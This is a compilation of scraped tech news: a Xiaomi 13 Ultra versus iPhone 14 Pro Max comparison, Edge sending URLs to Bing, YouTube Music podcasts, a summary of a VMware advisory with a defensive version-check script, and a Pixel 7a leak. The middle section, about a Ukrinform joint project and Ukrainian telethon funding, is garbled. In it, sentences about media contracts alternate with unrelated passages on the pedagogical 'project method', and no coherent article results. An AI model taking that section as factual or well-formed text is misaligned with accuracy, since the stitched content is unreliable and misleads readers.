In low light, the Xiaomi 13 Ultra takes the cake. That is especially noticeable when you zoom into shots and see how much more detail that phone provides. I’m talking about the main camera, of course. Its sensor allows for way more light to enter the scene, and the software does a good job of balancing that, almost every time. The ultrawide camera performance is also better in low light, and the same goes for the telephoto camera. You’ll see more details across the board.

The iPhone 14 Pro Max still does an amazing job, though, and many people may actually prefer those results. When it comes to video recording, we’d give a slight advantage to Apple, even though the Xiaomi 13 Ultra is almost on par in that regard. It does a better job in low light, that’s for sure, which is especially noticeable when you’re panning around.

Audio

There is a set of stereo speakers on each of these two devices. Those speakers do a good job in both cases, but the Xiaomi 13 Ultra has the edge. Its sound is a bit more detailed, and there’s also more bass here. These speakers also get a bit louder.

What you will not find on either phone is an audio jack. You’ll have to use the Lightning port on the iPhone 14 Pro Max, and a Type-C port on the Xiaomi 13 Ultra if you’d like to achieve a wired audio connection. If you’d rather go wireless, Bluetooth 5.3 is available on both phones.



Microsoft Edge is reportedly leaking users’ browsing data to Bing


Ever since the start of the AI revolution with the launch of ChatGPT and its subsequent integration into the Edge browser as the Bing AI chatbot, Microsoft has been striving to improve the service and provide a better browsing experience for its users. However, the latest version of Microsoft Edge has come under scrutiny as recent reports suggest the browser may be leaking users’ browsing data to Bing without their knowledge or consent.

The issue was first discovered by Reddit user hackermchackface, who noticed that the Edge browser sent a request to bingapis.com with the full URL of nearly every page they navigated to. This raises some serious privacy concerns.

The real cause behind the issue?

Although the Edge browser sending a request to Bing and leaking users’ browsing data was a privacy concern, upon further investigation, Rafael Rivera, a software engineer, found that the real culprit behind the issue was Edge’s new “follow” feature. He explained that the feature, which allows users to keep track of their favorite creators, such as their websites, YouTube channels, and other social media accounts, is somehow not functioning correctly and sending nearly every domain that a user visits to Bing.

Speaking on the concerns, Caitlin Roulston, director of communications at Microsoft, stated that they are aware of the reports and are investigating the issue. However, the company is yet to come out with an explanation as to why Edge was sending URLs to bingapis.com.

Disable Edge’s “follow” feature

Until Microsoft comes out with a solution to fix the issue, users should turn off the “follow” feature. To do this, head over to Settings > Privacy, Search, and Services > Services and click on the toggle for “Show suggestions to follow creators in Microsoft Edge.” This will prevent Edge from sending URLs to Bing, thus protecting users’ privacy.



YouTube Music officially rolls out Podcasts in the U.S.

YouTube Music has officially launched a podcast feature for listeners in the United States, offering a new way for users to access their favorite shows and discover new ones. The feature is rolling out on the YouTube Music app, both on iOS and Android, and allows users to access a variety of podcasts across a range of genres. The announcement was made today via a YouTube Community post, making the feature official since it was reported that it was in testing phases back in February and announced to the media later that same month.

With the new podcast feature, YouTube Music is expanding its content offerings beyond music to include spoken-word content. This move is in line with the growing popularity of podcasts in recent years, as listeners seek out new forms of entertainment and information. By offering podcasts, YouTube Music hopes to attract more users to its platform and keep existing users engaged. The launch of podcasts on YouTube Music comes at a time when the podcast market is experiencing significant growth, with the main YouTube app serving podcasts in the interim. As a listening experience that complements the podcast video experience on YouTube, this presents a significant opportunity for YouTube Music to tap into the growing demand for podcasts and expand its audience reach.
To access podcasts on YouTube Music, users simply need to search for their favorite shows or browse by category. New podcast recommendations and unfinished episodes will be accessible on the Home tab where you can filter by tapping “Podcasts” at the top of the home screen. The platform offers a range of categories, including: business, comedy, gaming, health & fitness, music, society & culture, and true crime. Users can also discover new shows through personalized recommendations based on their listening history and preferences.
Podcasts that were previously available in the main YouTube app will also be in YouTube Music, where they will be available on-demand, when offline, or while casting. You will also be able to effortlessly transition between the audio and video versions of a podcast, just as you can do now with music and music videos.

The podcast listening experience is different from the music listening experience on YouTube Music in that you do not need to have a Premium or Music Premium subscription in order to access some of the features. For those that are Premium subscribers, do note that the ad-free experience does not extend to host-read endorsements or sponsorship messages in podcasts.

As of right now, Podcasts on YouTube Music are only available in the United States. However, this may change in the future, according to the announcement. The feature is also rolling out gradually, so you may not see it in your YouTube Music app right away.



Critical VMware Vulnerabilities Let Attackers Execute Code


Several privately reported flaws in VMware Workstation, Workstation Pro, and Fusion have been fixed. VMware has published a security advisory on the critical bugs discovered and their workarounds.

CVE(s):

  • CVE-2023-20869 – Stack-based buffer-overflow vulnerability in Bluetooth device-sharing functionality
  • CVE-2023-20870 – Information disclosure vulnerability in Bluetooth device-sharing functionality
  • CVE-2023-20871 – VMware Fusion Raw Disk local privilege escalation vulnerability
  • CVE-2023-20872 – Out-of-bounds read/write vulnerability

The severity of these CVEs varies from 7.1 to 9.3. However, VMware has released a patch for all the affected versions.

CVE-2023-20869 – Stack-based buffer-overflow vulnerability in Bluetooth device-sharing functionality

CVSS Score: 9.3

To exploit this, a threat actor must have local admin privileges on the virtual machine. Exploitation leads to the execution of code using VMware’s VMX process on the host machine.

Affected Products and Fixed Versions

CVE-2023-20870 – Information disclosure vulnerability in Bluetooth device-sharing functionality

CVSS Score: 7.1

To exploit this, a threat actor must have local admin privileges on the virtual machine. Exploitation leads to the reading of privileged information on VMware’s hypervisor memory used for isolating virtual machines from each other. This memory includes CPU utilization, OS on the virtual machine, memory utilization, and much more.

Affected Products and Fixed Versions

  • VMware Workstation Pro / Player (Workstation) – Fixed in 17.0.2
  • VMware Fusion – Fixed in 13.0.2

CVE-2023-20871 – VMware Fusion Raw Disk local privilege escalation vulnerability

CVSS Score: 7.3

To exploit this, a threat actor must have read/write access to the host machine. Exploitation leads to gaining root access to the host operating system.

Affected Products and Fixed Versions

  • VMware Fusion – Fixed in 13.0.2

CVE-2023-20872 – Out-of-bounds read/write vulnerability

CVSS Score: 7.1

To exploit this, a threat actor must have a virtual machine with a physical CD/DVD drive attached and a SCSI controller configured with the host machine. Exploitation leads to the execution of code in VMware’s hypervisor memory from the virtual machine. The threat actor does not need local admin privileges for this vulnerability.

Affected Products and Fixed Versions

  • VMware Workstation Pro / Player (Workstation) – Fixed in 17.0.1
  • VMware Fusion – Fixed in 13.0.1

For more information on these CVEs, please visit VMware’s security advisory.

Furthermore, two of these vulnerabilities (CVE-2023-20869, CVE-2023-20870) were initially discovered and reported by STAR Labs at Pwn2Own 2023, held in Vancouver in March 2023. The reward provided for these zero days was $80,000.
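As an added example (not code from VMware or from the article's author), the following Python script triages a software inventory against the fixed versions quoted above. The host names and inventory rows are constructed, CVE-2023-20869 is left out because the article lists no fixed versions for it, and treating older major lines as "check advisory" is an assumption, since the article does not say whether they are affected.

```python
import re

# Fixed versions exactly as quoted in the article above. CVE-2023-20869 is
# omitted because the article lists no fixed versions for it.
FIXED = {
    "CVE-2023-20870": {"workstation": (17, 0, 2), "fusion": (13, 0, 2)},
    "CVE-2023-20871": {"fusion": (13, 0, 2)},
    "CVE-2023-20872": {"workstation": (17, 0, 1), "fusion": (13, 0, 1)},
}

UPDATE = "update required"
PATCHED = "patched"
NOT_LISTED = "product not listed"
CHECK = "check advisory"


def parse_version(text):
    """Turn '17.0.1' or '17.0.1 build-1234' into the tuple (17, 0, 1)."""
    match = re.match(r"\s*(\d+)\.(\d+)(?:\.(\d+))?", text)
    if not match:
        raise ValueError(f"unrecognised version string: {text!r}")
    return tuple(int(group or 0) for group in match.groups())


def product_key(name):
    """Map an inventory product name to the product family used in FIXED."""
    lowered = name.lower()
    for key in ("workstation", "fusion"):
        if key in lowered:
            return key
    return None


def triage(product, version):
    """Return {cve: status} for one installed product and version."""
    key = product_key(product)
    installed = parse_version(version)
    result = {}
    for cve, fixes in FIXED.items():
        fixed = fixes.get(key)
        if fixed is None:
            result[cve] = NOT_LISTED
        elif installed >= fixed:
            result[cve] = PATCHED
        elif installed[0] == fixed[0]:
            result[cve] = UPDATE
        else:
            # Assumption: the article does not state whether older major
            # lines are affected, so they are flagged for manual review.
            result[cve] = CHECK
    return result


def hosts_needing_update(inventory):
    """Return {host: [CVE ids]} for hosts that still need an update."""
    report = {}
    for host, product, version in inventory:
        statuses = triage(product, version)
        open_cves = sorted(c for c, s in statuses.items() if s == UPDATE)
        if open_cves:
            report[host] = open_cves
    return report


# Constructed sample inventory (host names and build strings are made up).
SAMPLE_INVENTORY = [
    ("dev-laptop-01", "VMware Workstation Pro", "17.0.1 build-0000000"),
    ("mac-build-02", "VMware Fusion", "13.0.0"),
    ("mac-build-03", "VMware Fusion", "13.0.2"),
    ("lab-pc-04", "VMware Workstation Player", "16.2.5"),
]

if __name__ == "__main__":
    for host, cves in hosts_needing_update(SAMPLE_INVENTORY).items():
        print(host, "->", ", ".join(cves))
```

A Workstation host on 17.0.1 is reported as patched for CVE-2023-20872 but still open for CVE-2023-20870, which is why each CVE is compared against its own fixed version.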




A Joint Information Project of Ukrinform and Media Center Ukraine Has Launched

After the committee members are selected, the student submits their list to the Commission for the Evaluation of Graduation Projects, which provides overall leadership and coordination of school-wide work on portfolio projects [319]. Applied (practice-oriented) projects, which students develop in the course of technological training, are distinguished by a result of the participants' activity that is clearly defined from the outset and takes their social and professional interests into account. Such a project requires a carefully thought-out structure, a scenario for the participants' activity that defines the functions of each of them, clear conclusions, and participation in presenting the results of the final product [ibid.]. 🔸 The war is being fought not only for territorial integrity but also in the information space.

  • Residents of more than fifty cities and capitals took to the streets to support Ukraine and join the telethon, and 30 world political leaders addressed Ukrainians and the international community.
  • In addition to the editorial offices of the state enterprise “MPIU”, the media groups “1+1”, Starlight Media and “Inter Media Group” are also involved in producing content (as was the “Ukraine” media group until July 2022).
  • Of course, when the advertising market is recovering slowly, state money can become a vital source of income for commercial TV channels.
  • Such projects are usually carried out outside lesson time, although part of the work on them can also be done in lessons.
  • On 26 February they were joined by “Ukraine”/“Ukraine 24” and Suspilne.
  • However, it is generally accepted that by an educational project primary school understands a special kind of educational and cognitive activity of students, aimed at forming a system of knowledge and skills and creating an educational product of subjective or objective significance.

The main function of project activity is searching for information, processing it, understanding it and presenting it to the members of the project group. To involve students in the creative process of making their own products. To develop students' research skills, the ability to observe, put forward hypotheses and generalise, and analytical thinking. A portfolio formed in the field of education is integrated into professional and workplace assessment systems, which makes possible the early formation of students' professionally significant skills. Such uniformity of the information space contributed to the cohesion of society and to improved attitudes towards state institutions and the president. The fact that the European Union had non-publicly expressed concern to official Kyiv over its media policy in Ukraine was confirmed in September by Germany's ambassador to Ukraine, Anka Feldhusen.

Instructional design is not a fundamentally new technology. The project method originated in the USA in the 20s of our century. It was first called the “problem method” in the work of John Dewey.

2 Types of Projects and Their Classification

The first two were before the start of the Russian invasion, the rest in October and December of last year. The day before the start of Russia's full-scale invasion, the parliamentary TV channel “Rada” signed 5 contracts with Kinokit LLC worth 180 million UAH for the production of various television programmes. The importance of external evaluation of all projects should be emphasised separately, since only in this way can their effectiveness, shortcomings and the need for timely correction be tracked. The nature of the external evaluation depends largely both on the type of project and on its topic (content) and the conditions under which it is carried out. At the initial stage of “United News”, the commercial media groups produced their parts of the marathon at their own expense, but when the opportunity arose asked for compensation from the state. In the first days of the war, the company appealed to international television providers to switch off broadcasting of Russian news channels on European satellites, cable networks, OTT platforms and other resources.

Some Ukrainian TV channels began working in joint-marathon mode immediately on 24 February in order to promptly inform viewers about the situation with the Russian invasion. In practice, one most often has to deal with mixed types of projects. Each type of project is characterised by a particular kind of coordination, time frame, stages and number of participants. Therefore, when developing a project, its features and characteristics must be taken into account. Multiprojects involve changing existing organisations and firms or creating new ones. A multiproject is the fulfilment of many orders (projects) and services within the production programme of a firm, limited by its production, financial and time capabilities and by customers' requirements.


The talk show with the working title “Tykhyi Vechir” (“Quiet Evening”), in Ukrainian, is produced by San Films LLC, with which 2 contracts worth 7.4 million UAH were signed last year. In total, the company received almost 19 million UAH from various state customers over the month. In total, “Kinokit” received 172.6 million UAH from various customers in 2022. On 25 February, “1+1”, “STB/ICTV”, “Inter” and “Rada” were already working in “United News” mode.

Informing, Volunteering and Helping on Various Fronts: How 1+1 media Works in Wartime

Instructions, online tasks for fighting in the cyber environment, and useful information on the rules of cyber hygiene are provided systematically. The television project with the working title “Ranok Vdoma” (“Utro Doma”) is produced by Overkat Studio LLC. 5 contracts worth 13.4 million UAH were signed with the firm in 2022.


On Easter Sunday, a television broadcast of the charity concert “I vse bude dobre” (“And Everything Will Be Fine”) by the band Okean Elzy took place on most TV channels and platforms in Ukraine and in international media. The children's TV channel PLUSPLUS broadcasts animation without interruption so that the youngest Ukrainians have access to their favourite cartoons. The TV channels TET and 1+1 have combined their programming efforts, and now the best “plus” products, among them “Snidanok z 1+1”, ZhVL (Zhyttia vidomykh liudei, “Lives of Famous People”), “Svit navyvorit” and others, are available on TET. 1+1 media has also joined FREEДОМ, a joint project of Ukraine's leading media groups aimed at a Russian-speaking audience during wartime, in particular at the occupying forces.

“They earn a pittance from advertising, and political influence has been reduced to displays of loyalty to the authorities. Under such conditions, owning large media groups ceases to make sense. And we have already seen how Rinat Akhmetov simply liquidated his holding,” the expert explains. The same study showed a general decline in television consumption and growing interest in social networks. Thus, 36% of respondents choose television for getting news, which is 10% less than last year, while 74% of respondents get news from social networks, an increase of 9% compared with last year. “We have our own self-censorship; we discuss certain rules among ourselves. For example, if a big business is helping the state, can it be talked about?” he asks. “My personal opinion is that it definitely should be, so that the country knows who these people are.” At the same time, the telethon participants with whom BBC News Ukraine spoke deny any pressure or censorship from the authorities.

Talk Show “Tykhyi Vechir”: 7.4 Million UAH in 2022 (Paid), 32.8 Million UAH in 2023

This training gives teachers the opportunity to build positive relationships with students in new conditions and to emphasise their individuality and natural talents. The basis of this method is developing students' cognitive interests, their ability to acquire knowledge independently and to navigate the information space, to show competence in problems related to the project's subject matter, and to develop critical thinking. This method always focuses on independent activities, such as those of individuals, pairs or groups, which students carry out over a certain period of time.


Real investment projects are carried out on the basis of investing in real assets (fixed assets, enterprises and so on). By the nature of the target task, projects are classified as anti-crisis, marketing, educational, innovation, restructuring and emergency. By the nature of the project, international and domestic projects are distinguished. By requirements on resource constraints, projects are classified as multi- and monoprojects. By complexity, projects are classified as simple, organisationally complex, technically complex, resource-complex and comprehensively complex. Andrii Shevchenko, a representative of Media Center Ukraine, thanked the Ministry of Culture and Information Policy and the Ukrinform agency for this initiative.

Citation and use of materials in offline media, mobile applications and SmartTV is possible only with the written consent of “ukrinform.ua”. Materials marked “Advertising” and “PR”, as well as materials in the “Releases” block, are published as advertising; the advertiser is responsible for their content. The DOZORRO project of Transparency International Ukraine calculated how much was spent on the various parts of the marathons in 2022 and what has already been procured for 2023. And also how much the production of some programmes for the state channel “Dom” costs. Owing to students' insufficient theoretical and practical knowledge and skills, monitoring of the completion of project tasks must be thorough. The theoretical and conceptual place of project technology in Ukrainian pedagogy was studied by N.

The assessment of completed projects should be encouraging. Primary school should recognise all students involved in implementing the project. Scholars define the term “project method” in different ways. It is defined as a specific practice of the teacher's work aimed at forming in students a system of specific intellectual and practical skills. And as a comprehensive teaching method; and as a pedagogical technique; and as a system of teaching.

“To Keep from Going Mad in the Cell, I Invented a Clothing Collection”: The Story of Herda from Azovstal, Whose Photo Moved Social Media

For practically all of this time, the channels produced their slots for “United News” at their own expense. Only in the last two months did the state partially cover the costs. At the same time, producing the marathon costs approximately million hryvnias a month, says Yaroslav Pakholchuk. A November study by Internews and USAID showed that practically all news consumers know about “United News”, but only 32% of respondents are viewers of the telethon.

This may be an emotional story, an imitation of a real-life problem, or a conversation about a specific situation in the classroom. The adviser and the student jointly plan the work on the portfolio and select the members of the Project Committee, which evaluates the project, the product created and its presentation. The committee includes teachers of English and of specialised training, as well as representatives of business, the community and others.


By the object of investment, projects are financial or real. Domestic projects are carried out within a single state. Monoprojects are individual projects of a certain type and scale. Join our channels on Telegram, Instagram and YouTube.

New Pixel 7a leak suggests all specs have been revealed


The Pixel 7a is supposed to be just weeks away from an official reveal at Google I/O, and the latest leak is now suggesting the full set of specs have been laid out in the open for all to see.

Some of these may not be new details, as a few of the specs have leaked before. However, this list of specifications, reported on by 91mobiles and offered up by Twitter user Yogesh Brar, seems to be complete. Not a single thing is left to the imagination.

And if all prove to be accurate, then consumers will know what they’re in store for well ahead of the announcement in May. At the very least it provides an opportunity to weigh the options and decide if the phone may be worth spending the money on.

Pixel 7a full specs leak ahead of official Google I/O reveal

Based on the leaked specs, the Pixel 7a is shaping up to be a decent phone for what is likely a reasonable price. According to the leak, the phone will come with a 6.1-inch FHD+ OLED display with a 90Hz refresh rate. The refresh rate was already rumored earlier this week. But the more important thing to remember is that Google is giving consumers what they want here. People expected the 90Hz display to be on the Pixel 6a, but when it came out without one, some people seem to have been disappointed.

This time around the 90Hz display will be there. In addition to the display, the leak also mentions the phone will come with a Tensor G2 chip, which is to be expected. It will also reportedly come with a 64MP rear camera with OIS and a 12MP wide-angle camera for the rear setup. On the front, a 10.8MP selfie camera will be present. The phone will also come with a 4,400mAh battery with support for 20W wired charging and support for wireless charging.

For storage and RAM, the leak suggests 8GB of RAM and 128GB of storage, in addition to running Android 13 out of the box with a price tag of $499. The Pixel 7a should make its official appearance at Google I/O next month, which takes place on May 10, so it’s only another couple of weeks away.

